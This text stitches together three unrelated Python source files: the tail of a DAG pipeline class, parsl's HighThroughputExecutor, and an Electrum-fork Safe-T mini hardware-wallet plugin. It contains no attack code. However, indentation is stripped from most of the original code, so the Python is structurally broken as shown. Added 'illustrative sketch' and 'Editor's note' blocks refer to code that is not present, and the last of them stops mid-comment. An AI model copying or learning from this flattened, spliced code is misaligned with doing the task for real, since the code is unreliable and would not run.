        Each OP starts a thread or a process depending on _is_thread_op.
Args:
None
Returns:
_threads_or_proces: threads or process list.
"""
self._threads_or_proces = []
for op in self._actual_ops:
op.use_profiler(self._use_profile)
op.set_tracer(self._tracer)
op.set_use_prometheus(self._use_prometheus)
if self._is_thread_op:
self._threads_or_proces.extend(op.start_with_thread())
else:
self._threads_or_proces.extend(op.start_with_process())
_LOGGER.info("[DAG] start")
if self._use_prometheus:
_LOGGER.info("Prometheus Start 1")
self.start_prom(self._prometheus_port)
# not join yet
return self._threads_or_proces
def join(self):
"""
All threads or processes join.
Args:
None
Returns:
None
"""
for x in self._threads_or_proces:
if x is not None:
x.join()
def stop(self):
"""
        Stopping and cleaning all channels.
Args:
None
Returns:
None
"""
for chl in self._channels:
chl.stop()
for op in self._actual_ops:
op.clean_input_channel()
op.clean_output_channels()
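# --- illustrative sketch (not part of the original module) -------------------
# Standalone illustration of the inverted, layered topological sort performed
# by DAG._topo_sort above, using the example from its docstring
# (A -> B -> C -> E with A -> D -> E). The plain-dict graph below is an
# assumption used only to show the layering; the real implementation walks Op
# objects and their input ops.
def _example_layered_topo_sort():
    # successors of each node (the role of out_degree_ops in the real code)
    succ = {"A": ["B", "D"], "B": ["C"], "C": ["E"], "D": ["E"], "E": []}
    preds = {n: [p for p, ss in succ.items() if n in ss] for n in succ}
    remaining_out = {n: len(ss) for n, ss in succ.items()}
    views = []
    layer = ["E"]  # start from the node feeding ResponseOp
    while layer:
        views.append(layer)
        next_layer = []
        for node in layer:
            for pred in preds[node]:
                remaining_out[pred] -= 1
                if remaining_out[pred] == 0:  # all successors already placed
                    next_layer.append(pred)
        layer = next_layer
    # e.g. [['E'], ['C', 'D'], ['B'], ['A']] (order within a view may vary)
    return views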
|
executor.py
|
"""HighThroughputExecutor builds on the Swift/T EMEWS architecture to use MPI for fast task distribution
"""
from concurrent.futures import Future
import logging
import threading
import queue
import pickle
from multiprocessing import Process, Queue
from ipyparallel.serialize import pack_apply_message # ,unpack_apply_message
from ipyparallel.serialize import deserialize_object # ,serialize_object
from parsl.executors.high_throughput import zmq_pipes
from parsl.executors.high_throughput import interchange
from parsl.executors.errors import *
from parsl.executors.base import ParslExecutor
from parsl.dataflow.error import ConfigurationError
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
BUFFER_THRESHOLD = 1024 * 1024
ITEM_THRESHOLD = 1024
class HighThroughputExecutor(ParslExecutor, RepresentationMixin):
"""Executor designed for cluster-scale
The HighThroughputExecutor system has the following components:
1. The HighThroughputExecutor instance which is run as part of the Parsl script.
    2. The Interchange, which acts as a load-balancing proxy between workers and Parsl
3. The multiprocessing based worker pool which coordinates task execution over several
cores on a node.
4. ZeroMQ pipes connect the HighThroughputExecutor, Interchange and the process_worker_pool
Here is a diagram
.. code:: python
| Data | Executor | Interchange | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|->outgoing_q---|-> process_worker_pool
| | | | batching | | |
Parsl<---Fut-| | | load-balancing| result exception
^ | | | watchdogs | | |
| | | Q_mngmnt | | V V
| | | Thread<--|-incoming_q<---|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
Parameters
----------
provider : :class:`~parsl.providers.provider_base.ExecutionProvider`
Provider to access computation resources. Can be one of :class:`~parsl.providers.aws.aws.EC2Provider`,
:class:`~parsl.providers.cobalt.cobalt.Cobalt`,
:class:`~parsl.providers.condor.condor.Condor`,
:class:`~parsl.providers.googlecloud.googlecloud.GoogleCloud`,
:class:`~parsl.providers.gridEngine.gridEngine.GridEngine`,
:class:`~parsl.providers.jetstream.jetstream.Jetstream`,
:class:`~parsl.providers.local.local.Local`,
:class:`~parsl.providers.sge.sge.GridEngine`,
:class:`~parsl.providers.slurm.slurm.Slurm`, or
:class:`~parsl.providers.torque.torque.Torque`.
label : str
Label for this executor instance.
launch_cmd : str
Command line string to launch the process_worker_pool from the provider. The command line string
will be formatted with appropriate values for the following values (debug, task_url, result_url,
        cores_per_worker, nodes_per_block, heartbeat_period, heartbeat_threshold, logdir). For example:
launch_cmd="process_worker_pool.py {debug} -c {cores_per_worker} --task_url={task_url} --result_url={result_url}"
address : string
An address to connect to the main Parsl process which is reachable from the network in which
workers will be running. This can be either a hostname as returned by `hostname` or an
IP address. Most login nodes on clusters have several network interfaces available, only
some of which can be reached from the compute nodes. Some trial and error might be
        necessary to identify what addresses are reachable from compute nodes.
worker_ports : (int, int)
Specify the ports to be used by workers to connect to Parsl. If this option is specified,
worker_port_range will not be honored.
worker_port_range : (int, int)
Worker ports will be chosen between the two integers provided.
interchange_port_range : (int, int)
Port range used by Parsl to communicate with the Interchange.
working_dir : str
Working dir to be used by the executor.
worker_debug : Bool
Enables worker debug logging.
managed : Bool
If this executor is managed by the DFK or externally handled.
cores_per_worker : float
cores to be assigned to each worker. Oversubscription is possible
by setting cores_per_worker < 1.0. Default=1
max_workers : int
Caps the number of workers launched by the manager. Default: infinity
suppress_failure : Bool
If set, the interchange will suppress failures rather than terminate early. Default: False
heartbeat_threshold : int
Seconds since the last message from the counterpart in the communication pair:
        (interchange, manager) after which the counterpart is assumed to be unavailable. Default: 120s
heartbeat_period : int
Number of seconds after which a heartbeat message indicating liveness is sent to the
        counterpart (interchange, manager). Default: 30s
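
    Example
    -------
    An illustrative construction (a sketch only; the worker counts and provider
    settings below are assumptions, not defaults of this module):

    .. code:: python

        htex = HighThroughputExecutor(
            label='htex_local',
            address='127.0.0.1',
            cores_per_worker=1.0,
            max_workers=4,
            provider=LocalProvider(),
        )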
"""
def __init__(self,
label='HighThroughputExecutor',
provider=LocalProvider(),
launch_cmd=None,
address="127.0.0.1",
worker_ports=None,
worker_port_range=(54000, 55000),
interchange_port_range=(55000, 56000),
storage_access=None,
working_dir=None,
worker_debug=False,
cores_per_worker=1.0,
max_workers=float('inf'),
heartbeat_threshold=120,
heartbeat_period=30,
suppress_failure=False,
managed=True):
logger.debug("Initializing HighThroughputExecutor")
self.label = label
self.launch_cmd = launch_cmd
self.provider = provider
self.worker_debug = worker_debug
self.storage_access = storage_access if storage_access is not None else []
if len(self.storage_access) > 1:
raise ConfigurationError('Multiple storage access schemes are not supported')
self.working_dir = working_dir
self.managed = managed
self.blocks = []
self.tasks = {}
self.cores_per_worker = cores_per_worker
self.max_workers = max_workers
self._task_counter = 0
self.address = address
self.worker_ports = worker_ports
self.worker_port_range = worker_port_range
self.interchange_port_range = interchange_port_range
self.heartbeat_threshold = heartbeat_threshold
self.heartbeat_period = heartbeat_period
self.suppress_failure = suppress_failure
self.run_dir = '.'
if not launch_cmd:
self.launch_cmd = ("process_worker_pool.py {debug} {max_workers} "
"-c {cores_per_worker} "
"--task_url={task_url} "
"--result_url={result_url} "
"--logdir={logdir} "
"--hb_period={heartbeat_period} "
"--hb_threshold={heartbeat_threshold} ")
def initialize_scaling(self):
""" Compose the launch command and call the scale_out
This should be implemented in the child classes to take care of
executor specific oddities.
"""
debug_opts = "--debug" if self.worker_debug else ""
max_workers = "" if self.max_workers == float('inf') else "--max_workers={}".format(self.max_workers)
l_cmd = self.launch_cmd.format(debug=debug_opts,
task_url=self.worker_task_url,
result_url=self.worker_result_url,
cores_per_worker=self.cores_per_worker,
max_workers=max_workers,
nodes_per_block=self.provider.nodes_per_block,
heartbeat_period=self.heartbeat_period,
heartbeat_threshold=self.heartbeat_threshold,
logdir="{}/{}".format(self.run_dir, self.label))
self.launch_cmd = l_cmd
logger.debug("Launch command: {}".format(self.launch_cmd))
self._scaling_enabled = self.provider.scaling_enabled
logger.debug("Starting HighThroughputExecutor with provider:\n%s", self.provider)
if hasattr(self.provider, 'init_blocks'):
try:
self.scale_out(blocks=self.provider.init_blocks)
except Exception as e:
logger.error("Scaling out failed: {}".format(e))
raise e
def start(self):
"""Create the Interchange process and connect to it.
"""
self.outgoing_q = zmq_pipes.TasksOutgoing("127.0.0.1", self.interchange_port_range)
self.incoming_q = zmq_pipes.ResultsIncoming("127.0.0.1", self.interchange_port_range)
self.command_client = zmq_pipes.CommandClient("127.0.0.1", self.interchange_port_range)
self.is_alive = True
self._executor_bad_state = threading.Event()
self._executor_exception = None
self._queue_management_thread = None
self._start_queue_management_thread()
self._start_local_queue_process()
logger.debug("Created management thread: {}".format(self._queue_management_thread))
if self.provider:
self.initialize_scaling()
else:
self._scaling_enabled = False
logger.debug("Starting HighThroughputExecutor with no provider")
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
logger.debug("[MTHREAD] queue management worker starting")
while not self._executor_bad_state.is_set():
try:
msgs = self.incoming_q.get(timeout=1)
# logger.debug("[MTHREAD] get has returned {}".format(len(msgs)))
except queue.Empty:
logger.debug("[MTHREAD] queue empty")
# Timed out.
pass
except IOError as e:
logger.exception("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.exception("[MTHREAD] Caught unknown exception: {}".format(e))
return
else:
if msgs is None:
logger.debug("[MTHREAD] Got None, exiting")
return
else:
for serialized_msg in msgs:
try:
msg = pickle.loads(serialized_msg)
tid = msg['task_id']
except pickle.UnpicklingError:
raise BadMessage("Message received could not be unpickled")
except Exception:
raise BadMessage("Message received does not contain 'task_id' field")
if tid == -1 and 'exception' in msg:
logger.warning("Executor shutting down due to version mismatch in interchange")
self._executor_exception, _ = deserialize_object(msg['exception'])
logger.exception("Exception: {}".format(self._executor_exception))
# Set bad state to prevent new tasks from being submitted
self._executor_bad_state.set()
# We set all current tasks to this exception to make sure that
# this is raised in the main context.
for task in self.tasks:
self.tasks[task].set_exception(self._executor_exception)
break
task_fut = self.tasks[tid]
if 'result' in msg:
result, _ = deserialize_object(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
try:
s, _ = deserialize_object(msg['exception'])
# s should be a RemoteExceptionWrapper... so we can reraise it
try:
s.reraise()
except Exception as e:
task_fut.set_exception(e)
except Exception as e:
# TODO could be a proper wrapped exception?
task_fut.set_exception(
DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
else:
raise BadMessage("Message received is neither result or exception")
if not self.is_alive:
break
logger.info("[MTHREAD] queue management worker finished")
# When the executor gets lost, the weakref callback will wake up
# the queue management thread.
def weakref_cb(self, q=None):
"""We do not use this yet."""
q.put(None)
def _start_local_queue_process(self):
""" Starts the interchange process locally
Starts the interchange process locally and uses an internal command queue to
get the worker task and result ports that the interchange has bound to.
"""
comm_q = Queue(maxsize=10)
self.queue_proc = Process(target=interchange.starter,
args=(comm_q,),
kwargs={"client_ports": (self.outgoing_q.port,
self.incoming_q.port,
self.command_client.port),
"worker_ports": self.worker_ports,
"worker_port_range": self.worker_port_range,
"logdir": "{}/{}".format(self.run_dir, self.label),
"suppress_failure": self.suppress_failure,
"heartbeat_threshold": self.heartbeat_threshold,
"logging_level": logging.DEBUG if self.worker_debug else logging.INFO
},
)
self.queue_proc.start()
try:
(worker_task_port, worker_result_port) = comm_q.get(block=True, timeout=120)
except queue.Empty:
logger.error("Interchange has not completed initialization in 120s. Aborting")
raise Exception("Interchange failed to start")
self.worker_task_url = "tcp://{}:{}".format(self.address, worker_task_port)
self.worker_result_url = "tcp://{}:{}".format(self.address, worker_result_port)
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
if self._queue_management_thread is None:
logger.debug("Starting queue management thread")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker)
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
logger.debug("Started queue management thread")
else:
logger.debug("Management thread already exists, returning")
def hold_worker(self, worker_id):
"""Puts a worker on hold, preventing scheduling of additional tasks to it.
This is called "hold" mostly because this only stops scheduling of tasks,
and does not actually kill the worker.
Parameters
----------
worker_id : str
Worker id to be put on hold
"""
c = self.command_client.run("HOLD_WORKER;{}".format(worker_id))
logger.debug("Sent hold request to worker: {}".format(worker_id))
return c
@property
def outstanding(self):
outstanding_c = self.command_client.run("OUTSTANDING_C")
logger.debug("Got outstanding count: {}".format(outstanding_c))
return outstanding_c
@property
def connected_workers(self):
workers = self.command_client.run("MANAGERS")
logger.debug("Got managers: {}".format(workers))
return workers
def submit(self, func, *args, **kwargs):
"""Submits work to the the outgoing_q.
The outgoing_q is an external process listens on this
queue for new work. This method behaves like a
submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- *args (list) : List of arbitrary positional arguments.
Kwargs:
- **kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
if self._executor_bad_state.is_set():
raise self._executor_exception
self._task_counter += 1
task_id = self._task_counter
logger.debug("Pushing function {} to queue with args {}".format(func, args))
self.tasks[task_id] = Future()
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024,
item_threshold=1024)
msg = {"task_id": task_id,
"buffer": fn_buf}
# Post task to the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return self.tasks[task_id]
@property
def scaling_enabled(self):
return self._scaling_enabled
def scale_out(self, blocks=1):
"""Scales out the number of blocks by "blocks"
Raises:
NotImplementedError
"""
r = []
for i in range(blocks):
if self.provider:
block = self.provider.submit(self.launch_cmd, 1, 1)
logger.debug("Launched block {}:{}".format(i, block))
if not block:
raise(ScalingFailed(self.provider.label,
"Attempts to provision nodes via provider has failed"))
self.blocks.extend([block])
else:
logger.error("No execution provider available")
r = None
return r
def scale_in(self, blocks):
"""Scale in the number of active blocks by specified amount.
The scale in method here is very rude. It doesn't give the workers
the opportunity to finish current tasks or cleanup. This is tracked
in issue #530
Raises:
NotImplementedError
"""
to_kill = self.blocks[:blocks]
if self.provider:
r = self.provider.cancel(to_kill)
return r
def status(self):
"""Return status of all blocks."""
status = []
if self.provider:
status = self.provider.status(self.blocks)
return status
def shutdown(self, hub=True, targets='all', block=False):
"""Shutdown the executor, including all workers and controllers.
This is not implemented.
Kwargs:
- hub (Bool): Whether the hub should be shutdown, Default:True,
- targets (list of ints| 'all'): List of block id's to kill, Default:'all'
- block (Bool): To block for confirmations or not
Raises:
NotImplementedError
"""
logger.warning("Attempting HighThroughputExecutor shutdown")
# self.outgoing_q.close()
# self.incoming_q.close()
self.queue_proc.terminate()
logger.warning("Finished HighThroughputExecutor shutdown attempt")
return True
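# --- Editor's note: a minimal usage sketch, not part of the original module. ---
# It illustrates the flow documented above: submit() pickles the task onto the
# outgoing queue, the interchange hands it to a worker, and the queue management
# thread resolves the returned Future from the result/exception message.
# The label, run_dir path, and worker count below are illustrative only.
def _example_htex_usage():
    """Hypothetical sketch: submit one task and wait for its result."""
    executor = HighThroughputExecutor(label='htex_example', max_workers=2)
    executor.run_dir = '/tmp/htex_example'  # normally set by the surrounding framework before start()
    executor.start()                        # spawns the interchange process and management thread
    future = executor.submit(pow, 2, 10)    # returns a concurrent.futures.Future
    result = future.result()                # blocks until a result message arrives -> 1024
    executor.shutdown()
    return result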
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_atom.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_atom.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_atom import constants
from electrum_atom.i18n import _
from electrum_atom.plugin import BasePlugin, Device
from electrum_atom.transaction import deserialize, Transaction
from electrum_atom.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_atom.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'Safe-T mini', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
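# --- Editor's note: a standalone sketch, not part of the original plugin. ---
# It mirrors two pieces of bookkeeping used throughout the class above: the
# electrum txin-type -> Safe-T script-type mapping and the "%s/%d/%d" address
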